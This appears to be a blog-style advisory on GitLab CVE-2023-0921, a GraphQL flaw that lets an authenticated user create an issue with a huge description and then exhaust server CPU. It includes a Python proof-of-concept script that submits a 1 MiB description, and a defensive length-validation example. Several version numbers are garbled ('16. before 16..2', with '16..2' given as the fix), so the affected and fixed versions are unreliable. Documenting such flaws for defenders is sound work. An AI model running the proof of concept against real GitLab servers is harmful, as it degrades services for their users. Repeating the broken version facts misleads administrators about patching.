A newly discovered security vulnerability (CVE-2023-0921) has been identified in GitLab CE/EE. It affects all versions from 8.3 before 15.10.8, 15.11 before 15.11.7, and 16. before 16..2. The vulnerability is caused by a lack of length validation in the GraphQL implementation, which allows an authenticated attacker to create an Issue with a very large description. When that issue is repeatedly requested, the result is excessive CPU usage and degraded system performance. In this post, we'll discuss the vulnerability details, the code snippet associated with it, and the original references.

Vulnerability Details

This vulnerability is a result of inadequate length validation for issue descriptions created via the GraphQL API in GitLab. The impact of this vulnerability is twofold. First, an authenticated attacker can create an issue with an excessively large description. Second, when this issue is repeatedly requested using the GraphQL API, the CPU usage increases significantly, consequently affecting the system's performance.

Exploit Details

An attacker can exploit this vulnerability by creating an issue with a large description and then repeatedly requesting this issue using the GraphQL API. The attacker needs to be authenticated to create issues within a project. However, any authenticated user can exploit this vulnerability, making it a serious threat to GitLab instances with a large number of users.

The following code snippet demonstrates how an attacker can create an issue with a large description:

import requests

# Replace gitlab_url, project_id, and private_token with appropriate values.
# Note: the createIssue mutation's projectPath argument takes the project's
# full path (e.g. "group/project"), not a numeric project ID.
gitlab_url = "https://gitlab.example.com"
project_id = "YOUR_PROJECT_ID"
private_token = "YOUR_PRIVATE_TOKEN"

# Generate a large issue description (2**20 characters, i.e. 1 MiB of "A")
large_issue_description = "A" * 2**20

# Build the createIssue mutation with the description embedded inline
graphql_query = """
mutation {
  createIssue(input: {
    projectPath: "%s"
    title: "Large issue description test"
    description: "%s"
  }) {
    issue {
      iid
      title
      description
    }
  }
}
""" % (project_id, large_issue_description)

# Send the API call to create the issue
response = requests.post(
  f"{gitlab_url}/api/graphql",
  json={"query": graphql_query},
  headers={"Private-Token": private_token},
)

# A 200 status with no "errors" entry in the body means the issue was accepted
print(response.status_code, response.json().get("errors"))

Original References

- GitLab Security Advisory
- NIST National Vulnerability Database

Mitigation

To mitigate this vulnerability, users must upgrade their GitLab instances to one of the following versions:

16..2

This can be done by following the upgrade instructions provided in the GitLab documentation.
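The check whose absence this advisory describes, written here as an added example and not taken from GitLab's own code: a gate that measures the description in a GraphQL createIssue request (passed inline, as in the snippet above, or through GraphQL variables) and rejects it above a configurable limit. The limit value, the sample requests and the function names are assumptions made for illustration.

```python
import json
import re

# Assumed limit for this example (a placeholder, not GitLab's own bound):
# descriptions longer than this are rejected before the mutation is executed.
MAX_DESCRIPTION_CHARS = 100_000

# Description passed as an inline string literal in the createIssue input.
# The "unrolled loop" body ([^"\\]*(?:\\.[^"\\]*)*) handles escaped quotes
# without per-character backtracking, so a 1 MiB literal is matched quickly.
_INLINE_DESCRIPTION = re.compile(
    r'createIssue\s*\(\s*input\s*:\s*\{.*?\bdescription\s*:\s*"([^"\\]*(?:\\.[^"\\]*)*)"',
    re.S,
)

def description_length(body: dict) -> int:
    """Length of the issue description in a GraphQL request body
    ({"query": ..., "variables": ...}); 0 if no createIssue description is present.
    GraphQL variables are checked first, then an inline literal in the query text."""
    variables = body.get("variables") or {}
    if isinstance(variables, str):  # some clients send variables as a JSON string
        variables = json.loads(variables)
    inp = variables.get("input", variables)
    if isinstance(inp, dict) and isinstance(inp.get("description"), str):
        return len(inp["description"])
    match = _INLINE_DESCRIPTION.search(body.get("query", ""))
    return len(match.group(1)) if match else 0

def validate_create_issue(body: dict, limit: int = MAX_DESCRIPTION_CHARS) -> tuple:
    """Gate for a createIssue request: (True, "ok") when the description fits,
    otherwise (False, reason). Call it before handing the mutation to the resolver."""
    n = description_length(body)
    if n > limit:
        return False, f"description too long: {n} chars (limit {limit})"
    return True, "ok"

# Constructed sample requests: the inline-literal shape used in the snippet above
# (1 MiB of "A"), and an ordinary variables-based request with a short description.
OVERSIZED_INLINE = {
    "query": 'mutation { createIssue(input: { projectPath: "group/proj" '
             'title: "t" description: "%s" }) { issue { iid } } }' % ("A" * 2**20)
}
NORMAL_VARIABLES = {
    "query": "mutation($input: CreateIssueInput!) { createIssue(input: $input) { issue { iid } } }",
    "variables": {"input": {"projectPath": "group/proj", "title": "t", "description": "short text"}},
}

if __name__ == "__main__":
    for name, req in (("inline 1 MiB", OVERSIZED_INLINE), ("variables", NORMAL_VARIABLES)):
        print(name, validate_create_issue(req))
```

Rejecting the request at this boundary also removes the repeated-read cost, since an oversized description is never stored in the first place.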

Conclusion

The CVE-2023-0921 vulnerability highlights the importance of input validation, particularly in applications like GitLab with vast and diverse user bases. To secure your GitLab instance, it is highly recommended to upgrade to the latest versions and routinely ensure that your system is protected against new vulnerabilities.

Timeline

Published on: 06/06/2023 17:15:00 UTC
Last modified on: 06/12/2023 18:43:00 UTC